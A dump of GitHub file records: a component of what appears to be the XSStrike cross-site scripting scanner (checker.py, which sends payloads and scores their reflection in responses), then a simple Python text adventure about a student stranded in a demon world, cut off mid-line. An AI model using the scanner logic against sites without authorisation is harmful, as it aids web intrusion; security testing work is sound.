[ { "alpha_fraction": 0.6899641752243042, "alphanum_fraction": 0.6962365508079529, "avg_line_length": 38.89285659790039, "blob_id": "2ef47345b8444bed3f0ee782684fa49007084c4f", "content_id": "d070236254ff37d3c25ebae979740e8443b1eeeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 119, "num_lines": 28, "path": "/core/checker.py", "repo_name": "forkworkClone/XSStrike", "src_encoding": "UTF-8", "text": "import re\nimport copy\nfrom fuzzywuzzy import fuzz\nfrom core.config import xsschecker\nfrom urllib.parse import quote_plus\nfrom core.requester import requester\nfrom core.utils import replacer, fillHoles\n\ndef checker(url, params, headers, GET, delay, payload, positions, timeout):\n checkString = 'st4r7s' + payload\n paramsCopy = copy.deepcopy(params)\n response = requester(url, replacer(paramsCopy, xsschecker, checkString), headers, GET, delay, timeout).text.lower()\n reflectedPositions = []\n for match in re.finditer('st4r7s', response):\n reflectedPositions.append(match.start())\n filledPositions = fillHoles(positions, reflectedPositions)\n # Itretating over the reflections\n efficiencies = []\n for position in reflectedPositions:\n if position:\n reflected = response[position:position+len(checkString)]\n efficiency = fuzz.partial_ratio(reflected, checkString.lower())\n if reflected[-1] == '\\\\':\n efficiency += 1\n efficiencies.append(efficiency)\n else:\n efficiencies.append(0)\n return efficiencies" } ]
1
MeheroonTondra/text-based-adventure-game
https://github.com/MeheroonTondra/text-based-adventure-game
d4ab0d8888752ded8bb307abfdd9e689ab21e8f8
fbf7482ba303cd2d1c6c494c6d784916cf6339c3
3df031125c56df1fa1497c2cb1070270ee72e713
refs/heads/master
2021-07-19T20:58:54.668368
2017-10-29T23:43:31
2017-10-29T23:43:31
108,780,726
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7415730357170105, "alphanum_fraction": 0.7415730357170105, "avg_line_length": 28.33333396911621, "blob_id": "46c7b8ccd358603b08b44836dd87a572194d1cf8", "content_id": "868a2e6f3f57bf1a0a383ac30d410790deb1b988", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 89, "license_type": "no_license", "max_line_length": 31, "num_lines": 3, "path": "/README.md", "repo_name": "MeheroonTondra/text-based-adventure-game", "src_encoding": "UTF-8", "text": "# text-based-adventure-game\n# only show basic use of python\n# i think the story is good \n" }, { "alpha_fraction": 0.5701834559440613, "alphanum_fraction": 0.5753363966941833, "avg_line_length": 52.24760437011719, "blob_id": "17388e0dd48e680299aa45b603aff4e5c80003ea", "content_id": "111bf769de68b5f81ec3c4be097d005659888cbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33985, "license_type": "no_license", "max_line_length": 229, "num_lines": 626, "path": "/adventure.py", "repo_name": "MeheroonTondra/text-based-adventure-game", "src_encoding": "UTF-8", "text": "\r\n#a simple text-based adventure(boken) game. :)\r\nprint(\"*************************\")\r\nprint('* Welcome to Boken! *')\r\nprint(\"*************************\")\r\nname = input(\"Enter a user name:\")\r\nsex = input(\"sex?-M/F-\")\r\nprint(\"------------------\")\r\nprint(\"- Start game! -\")\r\nprint(\"------------------\")\r\nprint(\"User: \" + name + \"(\" + sex + \")\")\r\nspace = input(\"Click enter to continue: \")\r\nprint(name + \" is an ordinary high school student.\")\r\nprint(\"On an usual rainy evening, you arrive home from school.\\nThe sky was getting grey and the rain kept being incessantly heavy.\")\r\nprint(\"However, not eveything was the same as before; you \\nsee an unusual pattern drawn on your wall: like a magic circle!\")\r\nprint(\"A sudden lightening! 
A weird bright light seems to sip through \\nthe crack on the wall circle which made you blind.\\n\")\r\ninput(\"Press enter to continue.\")\r\nprint(\"--------------------\")\r\nprint(\"////////////////////\")\r\nprint(\"/ / / / / / / / / /\")\r\nprint(\"/ / / / / / /\")\r\nprint(\"/ / / / / \")\r\ninput(\"Press enter to continue.\")\r\nprint(\"\\n--Everthing's hazy: it's turning pitch black as you are slowly losing your senses.--\")\r\nprint(\"===================\")\r\nprint(\" unconcious \")\r\nprint(\"===================\")\r\nprint(\"\\n--You wake up from an almost deep slumber to find yourself in an unknown world.--\")\r\n#apple, jewel, potion numbers\r\namount = [0, 0, 0]\r\napple = 0\r\njewel = 0\r\npotion = 0\r\n\r\n#bag function prints the number of\r\n#apple, food and jewel you have\r\ndef bag():\r\n print(\"apple, jewel, potion: \")\r\n print(amount)\r\n return\r\n\r\n#to update apple in the array amount\r\ndef changeapple(n):\r\n amount[0] = apple + n\r\n bag()\r\n return\r\n\r\n#to update jewel in the array amount\r\ndef changejewel(n):\r\n amount[1] = jewel + n\r\n bag()\r\n return\r\n\r\n#to update potions in the array amount\r\ndef changepotion(n):\r\n amount[2] = potion + n\r\n bag()\r\n return\r\n\r\nprint(\"--After you are fully awake, you find yourself lost and alone with just an empty bag, which was never yours to begin with.--\")\r\nbag()\r\n\r\nprint(\"\\n===================\")\r\nprint(\" Level 1 \")\r\nprint(\"===================\")\r\nprint(\"\\n+++++++++++++++++++++++\")\r\nprint(\"+ + + + + + + + + + + +\")\r\nprint(\"| /|/ \\| | | | / | | /\")\r\nprint(\"|/ |/ \\| |/ \\|/ |/ \\|/\")\r\nprint(\"| || | || | || ||\")\r\nprint(\"----------------------\")\r\nprint(\"--While you did not know what to do inside this forest, a villager caught you in sight as he was passing by.--\")\r\nprint(\"Villager: A human!.....How on earth have you come here?!\")\r\nans = input(\"You: \")\r\nprint(\"--You are shocked by the villager's appearance: pointy ears and a tail--\")\r\nprint(\"Villager: It is dangerous for a human to stay here. Would you like to come with me to my home.\")\r\nprint(\"\\nChoose: 1(Would you like to go with the villager?) or 2(Would you like to continue on your own?)\")\r\nval = input(\"enter number: \")\r\n\r\n#When option 1 is chosen\r\nif val == '1':\r\n print(\"--You follow the villager to his home. You ask about this place and how you can go back to your home.--\")\r\n print(\"Villager: This is the demon world and you probably have been transported by a summoning circle.\")\r\n input(\"Press enter to continue!\")\r\n print(\"+ + + + + + + + + + + + + + + + + + + + + + + + \")\r\n print(\"_______________-----------------------=======----------)\")\r\n print(\"| $$ **** $$ |____| |____\")\r\n print(\"(east || |||| |+| |+| |__}\")\r\n print(\"{village ============||===========||=========== $$$ Capital |________)\")\r\n print(\"( || -+-+-+-+- *****\\/++++ __}_\")\r\n print(\"( ++++ $$ || -=-=-=- ____|||||_|_||||__________}\")\r\n print(\"( |||| || ***++ )___|\")\r\n print(\"----------------_______||||___$$______|\")\r\n print(\"+ + + + + + + + + + + + + + + + + + + + + + + + \\n\")\r\n\r\n print(\"Villager: Now you are in a small rural and in the furthest east village. 
Only farmers live here.\")\r\n print(\"Anyone from another world can only return using the magic circle in the capital centre.\")\r\n print(\"You: So, how can i get there, the capital center?\")\r\n print(\"Villager: You have follow the main route to the west, but you can't walk there as it's too far.Therefore, you need food and jewel to travel from our village to the capital.\")\r\n input(\"Press enter to continue!\")\r\n print(\"--------------------\")\r\n print(\" \\_/ \")\r\n print(\" _||__\")\r\n print(\" (_*_*_)\")\r\n print(\"--------------------\")\r\n print(\"Also, take this potion, drink it when you decide to travel so you can hide yor presence from evil demons.\")\r\n print(\"You: Thank you. I will take the potion\\n\")\r\n changepotion(1)\r\n print(\"\\nYou: What are jewel used for? Can you tell me where i can get food supply?\")\r\n print(\"Villager: We exchange jewel as our currency. You will need to find a job to earn some jewel.\")\r\n print(\"We have apples that you can eat and also you can find apple trees everywhere.\")\r\n print(\"You: How can i find a work in this world?\")\r\n print(\"Villager: You see there is a giant water serpent in the river. It is the only source of our water supply.\")\r\n print(\"Many were killed while trying to get water from that river. Our preserved water is also limited.O human!\\n Will you be kind enough to slaughter the serpent for us? We villagers will offer you 30 jewels.\")\r\n print(\"You: Thank you, kind villager! I will take on your offer.\\n\")\r\n print(\"--You followed the villager to the river where the water serpent is.--\")\r\n print(\"--On your way you find 10 apples on the ground.--\")\r\n input(\"To collect the 10 apples press enter: \")\r\n\r\n changeapple(10)\r\n\r\n print(\"\\n///////////////////////\")\r\n print(\"//___// \")\r\n print(\" / + \\ \")\r\n print(\" \\= \\_ \")\r\n print(\" | * \\_ |\")\r\n print(\" \\ * \\ / |\")\r\n print(\" \\ * \\ / /\")\r\n print(\"/////////////////////////\\n\")\r\n print(\"+++++++++++++++++\")\r\n print(\" Battle \")\r\n print(\"+++++++++++++++++\")\r\n print(\"--You take the sword given by the villagers and approach it slowly.--\")\r\n print(\"--As the slightest sound reached the serpent, it moves towards you to attack with its scales.--\")\r\n print(\"--You use your sword to deflect it's attack and it forces you back.--\")\r\n print(\"--You run forward to pierce it and the serpent creeps with its mouth open to swallow you whole.--\")\r\n print(\"________________\")\r\n print(\" SLASH \")\r\n print(\"________________\")\r\n print(\"--Your sword cut the inside of the serpents mouth, while you are gobbled.--\")\r\n print(\"--You are stuck inside the serpents belly with almost no energy to spare.--\")\r\n print(\"To regain all your stamina, you can eat 3 apples.\")\r\n input(\"To eat 3 apple write (3 apples): \\n\" )\r\n\r\n changeapple(7)\r\n\r\n print(\"\\n++++++++++++++++++++\")\r\n print(\" Full recovery \")\r\n print(\"+++++++++++++++++++++\")\r\n print(\"--Now, you use all force to cut open the serpent to escape.--\")\r\n print(\"--You hear screams as all the blood splatters with the serpent cut in half.--\")\r\n print(\"*After slaughtering serpent*\")\r\n print(\"(Villagers screaming with excitement)\")\r\n print(\"Villager 1: You are our hero! You saved us from the giant water serpent!\")\r\n print(\"Village chief: You have done so much for us kind stranger. 
Please accept a small reward from us:here is your 30 jewels.\")\r\n input(\"Type 'accept' to accept the jewels: \\n\")\r\n\r\n changejewel(30)\r\n\r\n print(\"\\nYou: Thank you all, i shall take off now.\")\r\n print(\"Before you leave the village, you have to drink the potion.\")\r\n input(\"To drink potion press enter: \\n\")\r\n\r\n changepotion(0)\r\n\r\n print(\"\\n--You pack your bag and head toward the capital. On your way you find the potion shop.--\")\r\n ans = input(\"Would you like to buy some potion? y/n: \")\r\n if ans == 'y':\r\n print(\"--You go to the potion shop and ask about the potions.--\")\r\n print(\"Potion Master: Hello, there! What kind of potions would you like to buy?\")\r\n print(\"You: I am not sure. What kind of potions do you have?\")\r\n print(\"Potion Master: I sell 1:(healing potions-10 jewels each) and 2:(invisible potions--5 jewels each).\")\r\n buy = input(\"Select the type of potion you want to buy, if you want to buy both, then type both: \")\r\n if buy == '1':\r\n print(\"Potion Master: How many of the healing potions would you like to buy?\")\r\n num = input(\"Enter the number potions you want: \")\r\n money = 10*int(num)\r\n print(\"Potion Master: For \" + str(num) + \" healing potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n\r\n print(\"\\n And take you potions.\\n\")\r\n changepotion(int(num))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n elif buy == '2':\r\n print(\"Potion Master: How many of the invisible potions would you like to buy?\")\r\n num = input(\"Enter the number potions you want: \")\r\n money = 5*int(num)\r\n print(\"Potion Master: For \" + str(num) + \" invisible potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n\r\n print(\"\\n And take you potions.\\n\")\r\n changepotion(int(num))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n elif buy == 'both':\r\n print(\"Potion Master: How many of the healing potions would you like to buy?\")\r\n num1 = input(\"Enter the number potions you want: \")\r\n print(\"Potion Master: How many of the invisible potions would you like to buy?\")\r\n num2 = input(\"Enter the number potions you want: \")\r\n money = (10*int(num1)) + (5*int(num2))\r\n print(\"Potion Master: For\" + str(num1) + \"healing potions and \" + str(num2) + \"invisible potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n print(\"\\n And take you potions.\\n\")\r\n\r\n changepotion(int(num1) + int(num2))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n else:\r\n print(\"--You continue to head to the capital.--\");\r\n\r\n\r\n#when option 2 is chosen\r\nelif val == '2':\r\n print(\"You: Thank you for you kindness but I think I will be able to travel on my own now.\")\r\n print(\"Villager: Alright, then take this potion. 
Drink it, this will hide your presence from evil demons.\")\r\n print(\"You: Thank you, i will accept the potion.\\n\")\r\n\r\n changepotion(1)\r\n\r\n input(\"\\nPress enter to continue!\")\r\n print(\"--You part with the villager and start to wonder around this big forest.--\")\r\n print(\"--You search for a way out of this forest and for food supply.--\")\r\n print(\"--Suddenly, you see apples lying on the ground; you look above and see a lot of big apple trees.--\")\r\n print(\"--You eat some apples to ease your hunger and pick 10 apples for your journey.--\")\r\n input(\"To pick 10 apples type 'pick apples': \")\r\n\r\n changeapple(10)\r\n\r\n print(\"\\n--After you secured the food, you continue to move forward. An abrupt howling sound!--\")\r\n print(\"--The frightening roar of a beast made you cautious. You have to run or kill it, if you want to live.--\")\r\n print(\"--The ground started to shake and a huge boar like creature is running toward you.--\\n\")\r\n\r\n print(\"+++++++++++++++++++++\")\r\n print(\" |\\______/| \")\r\n print(\" ({+} {+})\")\r\n print(\" ( \\ |-| / \")\r\n print(\" / (=======) \")\r\n print(\" ( VVVVVVV \")\r\n print(\" | ^^^^^^^ \")\r\n print(\"+++++++++++++++++++++\")\r\n\r\n print(\"\\n--The beast is closing in, almost hitting you.--\")\r\n print(\"--You dodge the hit, move back and start running.--\")\r\n print(\"--The beast chases you at the end of the forest and tries to attack you again.--\")\r\n print(\"--You grab the stones from the ground and hit the beast before it attacks you.--\")\r\n print(\"--You constantly keep hitting it hard and after a while the beast fell down.--\")\r\n print(\"--As you are relieved, the beast's body shattered into a spear.--\")\r\n print(\"--You are shocked by this transformation and slowly approach the shattered body.--\")\r\n print(\"--You check if it is safe, take the spear with you and move out of the forest.--\\n\")\r\n\r\n input(\"Press enter to continue: \")\r\n print(\"--You walk to nearby village across a river and a giant serpent attacks you from behind.--\")\r\n print(\"--You see some of the villagers screaming with fear and you look back to see the vicious serpent.--\\n\")\r\n\r\n print(\"\\n///////////////////////\")\r\n print(\"//___// \")\r\n print(\" / + \\ \")\r\n print(\" \\= \\_ \")\r\n print(\" | * \\_ |\")\r\n print(\" \\ * \\ / |\")\r\n print(\" \\ * \\ / /\")\r\n print(\"/////////////////////////\\n\")\r\n\r\n print(\"\\n--You are hit by the serpent and lose all you energy.--\")\r\n print(\"To regain all your stamina, you can eat 3 apples.\")\r\n input(\"To eat 3 apple write (3 apples): \\n\" )\r\n\r\n changeapple(7)\r\n\r\n print(\"\\n++++++++++++++++++++\")\r\n print(\" Full recovery \")\r\n print(\"+++++++++++++++++++++\")\r\n print(\"--You run forward to pierce the serpent with your spear. The spear kills off the serpent in one hit.--\")\r\n print(\"________________\")\r\n print(\" Pierce \")\r\n print(\"________________\")\r\n print(\"--You hear screams as the blood is spilling out of the serpent.--\")\r\n print(\"*After slaughtering serpent*\")\r\n print(\"(Villagers screaming with excitement)\")\r\n print(\"Villager 1: you are the human from before! Thank you very much.\")\r\n print(\"Villager 2: You are our hero! You saved us from the giant water serpent!\")\r\n print(\"Village chief: You have done so much for us kind stranger. 
Please accept a small reward from us:here is your 30 jewels.\")\r\n input(\"Type 'accept' to accept the jewels: \\n\")\r\n\r\n changejewel(30)\r\n\r\n print(\"\\nVillager: If you want to go back where you came from, then you should go to the capital centre.\")\r\n print(\"You: Where is the capital? How can i go there?\")\r\n print(\"Villager: Now you are in the East village. If you head to the West from here, you will reach the capital.\")\r\n print(\"You: Thank you all, i shall take off now.\")\r\n print(\"Before you leave the village, you have to drink the potion.\")\r\n input(\"To drink potion press enter: \\n\")\r\n\r\n changepotion(0)\r\n\r\n print(\"\\n--You pack your bag and head toward the capital. On your way you find the potion shop.--\")\r\n ans = input(\"Would you like to buy some potion? y/n: \")\r\n if ans == 'y':\r\n print(\"--You go to the potion shop and ask about the potions.--\")\r\n print(\"Potion Master: Hello, there! What kind of potions would you like to buy?\")\r\n print(\"You: I am not sure. What kind of potions do you have?\")\r\n print(\"Potion Master: I sell 1:(healing potions-10 jewels each) and 2:(invisible potions--5 jewels each).\")\r\n buy = input(\"Select the type of potion you want to buy, if you want to buy both, then type both: \")\r\n if buy == '1':\r\n print(\"Potion Master: How many of the healing potions would you like to buy?\")\r\n num = input(\"Enter the number potions you want: \")\r\n money = 10*int(num)\r\n print(\"Potion Master: For \" + str(num) + \" healing potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n\r\n print(\"\\n And take you potions.\\n\")\r\n changepotion(int(num))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n elif buy == '2':\r\n print(\"Potion Master: How many of the invisible potions would you like to buy?\")\r\n num = input(\"Enter the number potions you want: \")\r\n money = 5*int(num)\r\n print(\"Potion Master: For \" + str(num) + \" invisible potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n\r\n print(\"\\n And take you potions.\\n\")\r\n changepotion(int(num))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n elif buy == 'both':\r\n print(\"Potion Master: How many of the healing potions would you like to buy?\")\r\n num1 = input(\"Enter the number potions you want: \")\r\n print(\"Potion Master: How many of the invisible potions would you like to buy?\")\r\n num2 = input(\"Enter the number potions you want: \")\r\n money = (10*int(num1)) + (5*int(num2))\r\n print(\"Potion Master: For\" + str(num1) + \"healing potions and \" + str(num2) + \"invisible potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n print(\"\\n And take you potions.\\n\")\r\n\r\n changepotion(int(num1) + int(num2))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. 
Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n else:\r\n print(\"--You continue to head to the capital.--\");\r\n\r\n\r\n\r\n#level 2\r\nprint(\"\\n===================\")\r\nprint(\" Level 2 \")\r\nprint(\"===================\")\r\nprint(\"--While you are walking through this stangely different environment, you realized that you are far away from home.--\")\r\nprint(\"--The trees, plants and the landscape, all are very different. You are heading to the West to the Capital by foot.--\")\r\nprint(\"--As you walk, you see a sign board that says: 'Bubun village'--\")\r\nprint(\"+ + + + + + + + + + + + + + + + + + + + + + + + \")\r\nprint(\"_______________-----------------------=======----------)\")\r\nprint(\"| $$ **** $$ |____| |____\")\r\nprint(\"(east || |||| Bubun |+| |+| |__}\")\r\nprint(\"{village ============||====Village===||=========== $$$ Capital |________)\")\r\nprint(\"( || -+-+-+-+- *****\\/++++ __}_\")\r\nprint(\"( ++++ $$ || -=-=-=- ____|||||_|_||||__________}\")\r\nprint(\"( |||| || ***++ )___|\")\r\nprint(\"----------------_______||||___$$______|\")\r\nprint(\"+ + + + + + + + + + + + + + + + + + + + + + + + \\n\")\r\nprint(\"--Now you have entered the Bubun village, it seems full of beautiful greenery and flowers.--\")\r\nprint(\"--As you continue to move inside the village, all you see are dead withered plants and lifeless grounds.--\")\r\nprint(\"--You see two demons having a conversation. You approach them and overhear...--\")\r\nprint(\"Worker 1: This is just impossible! We try so hard to grow plants for making potion but they all wither! Damn that cursed demon!\")\r\nprint(\"Worker 2: If this continues the demon world is soon to end. Aren't the capital aware of that cursed demon. They should be sending someone who can bring that red lotus...\")\r\n\r\nprint(\"\\nYou: Sorry to interrupt. Could you tell me why the surrounding here seems withered?\")\r\nprint(\"Worker 1: Don't you know! It's the cursed demon's rampage! everything she touches, dies!\")\r\nprint(\"Worker 2: She was actually a worker here who unknowingly drunk her own experimented potion that went wrong. We need someone who can go to the pixis' den to get the red lotus. it's the only way to save her and this world.\")\r\nprint(\"You: What is the red lotus for?\")\r\nprint(\"-----------------------\")\r\nprint(\" (\\/\\/) \")\r\nprint(\" (\\/\\/\\/\\/) \")\r\nprint(\" (\\/\\/\\/\\/\\/) \")\r\nprint(\" (\\/\\/\\/\\/\\/\\/) \")\r\nprint(\" (\\/\\/\\/\\/\\/\\/\\/) \")\r\nprint(\" ( ******** ) \")\r\nprint(\" (___________) \")\r\nprint(\"-----------------------\")\r\nprint(\"Worker 1: We finally found that the smell of that flower can reverse the curse.\")\r\nprint(\"--You feel sorry for these demons.--\")\r\nprint(\"You: I'll go! I will help you. Where is the pixis' den?\")\r\nprint(\"Worker 1: Really! You can do it!\")\r\nprint(\"Worker 2: You walk straight on this path and it will lead you to the Wind forest. As you walk inside, there on the left side you will see the pixis' den.\")\r\nprint(\"You: I'll try my best.\")\r\nprint(\"Worker 2: The pixis are vicious creatures, but we have no choice. Here are 5 sleeping potions. Make sure the vapour of the potions spreads thoroughly without you inhaling it. Good luck!\")\r\ninput(\"To accept 5 sleeping potions type 'take': \\n\")\r\n\r\nchangepotion(amount[2]+5)\r\n\r\ninput(\"\\nPress enter to continue: \")\r\nprint(\"--You started to walk straight ahead on this path. 
After minutes of walk you see the forest.--\")\r\nprint(\"--You feel tired and hungry after all this walk. So you take a break and eat 3 apples.--\")\r\ninput(\"To eat 3 apples type 'eat': \\n\")\r\n\r\nchangeapple(4)\r\n\r\nprint(\"\\n--You walk inside the forest and keep walking, while looking on your left to find the pixis' den.--\")\r\nprint(\"--After walking for several minutes, you find the pixis' den.--\")\r\nprint(\"++++++=++++++++++++++========+++++++++++++++=========+++++++++++\")\r\nprint(\" ++++++++++++++++++++++++\")\r\nprint(\" +++++++ {^^^^^^^^^^^^^^^^^} \")\r\nprint(\" **************** __( )\")\r\nprint(\" | | | | | | | ========= ( pixis' den )\")\r\nprint(\" | | | | | | | | | | | __( )\")\r\nprint(\" | | | | | | | | | | | ^^^( ******* )___\")\r\nprint(\" | | | | | | | | | | | /\\/\\/\\( */\\/\\/\\/\\/\\/\\/\\/\\)\")\r\nprint(\"++++++=++++++++++++++========+++++++++++++++=========+++++++++++\")\r\nprint(\"--Finally, you found it. You slowly cover your nose and take out one of the sleeping potions.--\")\r\ninput(\"To use one sleeping potion write 'use': \\n\")\r\n\r\nchangepotion(amount[2]-1)\r\n\r\nprint(\"\\n--You use the sleeping potion on the pixis at the entrance and they fall asleep.--\")\r\nprint(\"--You carefully walk across the entrance and look for the red lotus, but few pixis comes out from the inside.--\")\r\nprint(\"--Pixis fiercely attack you with their stink. You have to hurry and make a decision.--\")\r\nfight = ['attack', 'dodge']\r\nprint(fight)\r\nchoice = input(\"Enter 'attack' to kill or 'dodge' to avoid: \")\r\nif choice == 'attack':\r\n print(\"--You attack the pixis with your weapon and deflect their attack. The next attack hits them all.--\")\r\n print(\"--You killed the attacking pixis.--\")\r\n print(\"--Now, You decide to go far inside the den to search for the red lotus.--\")\r\nelif choice == 'dodge':\r\n print(\"--You dodge the attacking pixis and use another sleeping potion.--\")\r\n input(\"To use another sleeping potion write 'use': \\n\")\r\n\r\n changepotion(amount[2]-1)\r\n print(\"\\n--The pixis fell on the ground and started to sleep.--\")\r\n print(\"--Now, You decide to go far inside the den to search for the red lotus.--\")\r\n\r\nprint(\"--As you walk inside in stealth motion, you see a large number of pixis surrounding a corner.--\")\r\nprint(\"--Therefore, you decide to use another sleeping potion.--\")\r\ninput(\"To use another sleeping potion write 'use': \\n\")\r\n\r\nchangepotion(amount[2]-1)\r\n\r\nprint(\"\\n--All the pixis have fallen asleep and you see the red lotus in a corner.--\")\r\ninput(\"To pluck the red lotus write 'pluck': \")\r\nprint(\"--You carefully plucked the red lotus and quickly get out of the pixis' den.--\")\r\nprint(\"--You walk out of the forest to meet the workers from before.--\\n\")\r\n\r\nprint(\"--You went back and saw one of the workers standing there.--\")\r\nprint(\"You: Hello Sir, i have come back with the red lotus from the pixis' den.\")\r\nprint(\"Worker 2: You have finally come back. At long last this curse will be broken.\")\r\nprint(\"--You give the red lotus to the worker. 
The workers made a potion for you to use on the cursed demon.--\")\r\nprint(\"Worker 1: Please take this red lotus potion and splash it on the cursed demon, who resides on the barren ground.\")\r\nprint(\"--You take the potion and follow the workers to the barren ground.--\")\r\nchangepotion(amount[2]+1)\r\nprint(\"--You all see the cursed demon sitting on the barren ground withering all around her.--\")\r\nprint(\"--You approach the demon slowly and take out the red lotus potion.--\")\r\ninput(\"To pour the lotus potion on the cursed demon write 'splash': \\n\")\r\n\r\nchangepotion(amount[2]-1)\r\n\r\nprint(\"\\n--After you splashed the potion, the cursed demon screeched and fainted.--\")\r\nprint(\"--A few seconds later, the curse is lifted, the demon is back to normal and the lands are turning green.--\")\r\nprint(\"++++++++++++++++++++++++++\")\r\nprint(\" * * * * * * * \")\r\nprint(\" ++ ++ ++ ++ ++ ++ ++ ++ \")\r\nprint(\" || || || || || || || ||\")\r\nprint(\"++++++++++++++++++++++++++\")\r\ninput(\"Press enter to continue: \")\r\nprint(\"*The workers shout with joy*\")\r\nprint(\"--The workers are happy and they want to offer 15 jewels and 1 sleeping potion for saving their friend.--\")\r\ninput(\"To accept 15 jewels and 1 sleeping potion write 'accept': \\n\")\r\n\r\nchangejewel(amount[1]+15)\r\nchangepotion(amount[2]+1)\r\n\r\nprint(\"Cured demon: Thank you for helping me. I want you to take this magic stone. It will help you in your journey.\")\r\nprint(\"You: Thank you. I will accept.\")\r\nprint(\"Workers: Thank you very much. Have a safe journey.\")\r\nprint(\"--You thank everyone and head out of the Bubun village to the Capital.--\")\r\ninput(\"Press enter to continue: \")\r\n\r\n#level 3\r\nprint(\"\\n===================\")\r\nprint(\" Level 3 \")\r\nprint(\"===================\")\r\nprint(\"+ + + + + + + + + + + + + + + + + + + + + + + + \")\r\nprint(\"_______________-----------------------=======----------)\")\r\nprint(\"| $$ **** $$ |____| |____\")\r\nprint(\"(east || |||| Bubun |+| |+| |__}\")\r\nprint(\"{village ============||====Village===||=========== $$$ Capital |________)\")\r\nprint(\"( || -+-+-+-+- *****\\/++++ __}_\")\r\nprint(\"( ++++ $$ || -=-=-=- ____|||||_|_||||__________}\")\r\nprint(\"( |||| || ***++ )___|\")\r\nprint(\"----------------_______||||___$$______|\")\r\nprint(\"+ + + + + + + + + + + + + + + + + + + + + + + + \\n\")\r\nprint(\"--You continue on your journey to the Capital, so you can go back home.--\")\r\nprint(\"--After a little walk, you pass by a cart on your way.--\")\r\nprint(\"--The cart driver approaches you.--\")\r\nprint(\"Cart driver: Would you like a ride in my cart? I am going to the capital. 15 jewels each.\")\r\nprint(\"You: Sure, thank you.\")\r\ninput(\"To pay for your ride write '15 jewels': \")\r\n\r\nchangejewel(amount[1]-15)\r\n\r\nprint(\"\\n--You get inside the cart and have a seat. You also notice that there are a few other passengers.--\")\r\nprint(\"--The cart starts to move and heads to the capital.--\")\r\nprint(\"--Many hours go by, and you wonder why the trip is taking so long.--\")\r\nprint(\"--A sudden halt: the cart stops moving. 
You think you have reached the Capital.--\")\r\nprint(\"--But to your surprise, you look outside to see that it has stopped in an unfamiliar shady forest.--\")\r\nprint(\"--All of a sudden, a group of bandits rushes toward the cart, shouting.--\")\r\nprint(\"--Before you can speak, they use sleeping potions.--\")\r\nprint(\"--Immediately you fall into a deep slumber!--\")\r\n\r\nprint(\"\\n===================\")\r\nprint(\" unconscious \")\r\nprint(\"===================\")\r\n\r\ninput(\"\\nPress enter to continue: \")\r\nprint(\"--A chaotic sound wakes you up. The bright daylight clears your vision. You realise that you have been kidnapped.--\")\r\nprint(\"--You look around to see that the other passengers are also tied up like you, with price tags on all your foreheads.--\")\r\nprint(\"--A day seems to have passed. You have been brought here by the bandits to be sold in the black-market.--\")\r\nprint(\"--You sit there helplessly at that slave auction.--\")\r\nprint(\"--You cannot figure out what to do; you are scared of being sold off like some of the other demons.--\")\r\nprint(\"--Anxious hours pass by and fortunately you are safe for a brief moment.--\")\r\nprint(\"--Night falls.--\")\r\nprint(\"--The auction has ended for today and you are taken to the storage chamber with some other demons.--\")\r\nprint(\"--Everyone seems to have fallen asleep.--\")\r\nprint(\"--You struggle to untie yourself and check your bag.--\")\r\nchangejewel(0)\r\n\r\nprint(\"\\n--You find no jewel in your bag; all the jewels are stolen.--\")\r\nprint(\"You can plan to escape this place or go to sleep hoping you will be saved soon.\")\r\ndecide = input(\"Enter 1:(to try to escape) or 2:(to sleep here for the night): \")\r\nif decide == '1':\r\n    print(\"\\n--You wander around to look for the key to this chamber.--\")\r\n    print(\"--You look here and there, but still can't find it. Your sight gets caught on a small hole in the wall.--\")\r\n    print(\"--You put your hand inside and you can feel a breeze. You look inside and see something shiny.--\")\r\n    print(\"--You take out the shiny object and it turns out to be a key.--\")\r\n    print(\"--You try this key on the door and it opens.--\")\r\n    print(\"--Misfortune does not seem to leave you: the guards see you open the door.--\")\r\n    print(\"--Before you can escape they hit you and you pass out.--\")\r\nelif decide == '2':\r\n    print(\"\\n--You hold onto your bag and look for a blanket.--\")\r\n    print(\"--You find a warm blanket and cover yourself to sleep.--\")\r\n\r\ninput(\"\\nPress enter to continue: \")\r\nprint(\"--You wake up the next morning and hear loud noises.--\")\r\nprint(\"--There seem to be some security officials who found out about this black-market sale.--\")\r\nprint(\"--Now, they are here to take everything into their custody.--\")\r\nprint(\"--You along with the other demons are chained up and taken to another official cart, which heads to the capital.--\")\r\ninput(\"Press enter to continue: \")\r\n\r\nprint(\"\\n--The cart stops after a few hours and you are brought inside the king's palace.--\")\r\nprint(\"Adviser: Sire! I can’t believe this! A human!\")\r\nprint(\"King: What! Such hindrance! How dare you trespass into our world!\")\r\nprint(\"--You are frozen with fear, wondering what will happen to you now. Will you ever be able to go back?--\")\r\nprint(\"You: But I… I don’t know anything….\")\r\nprint(\"King: I hereby declare this imposter’s execution! 
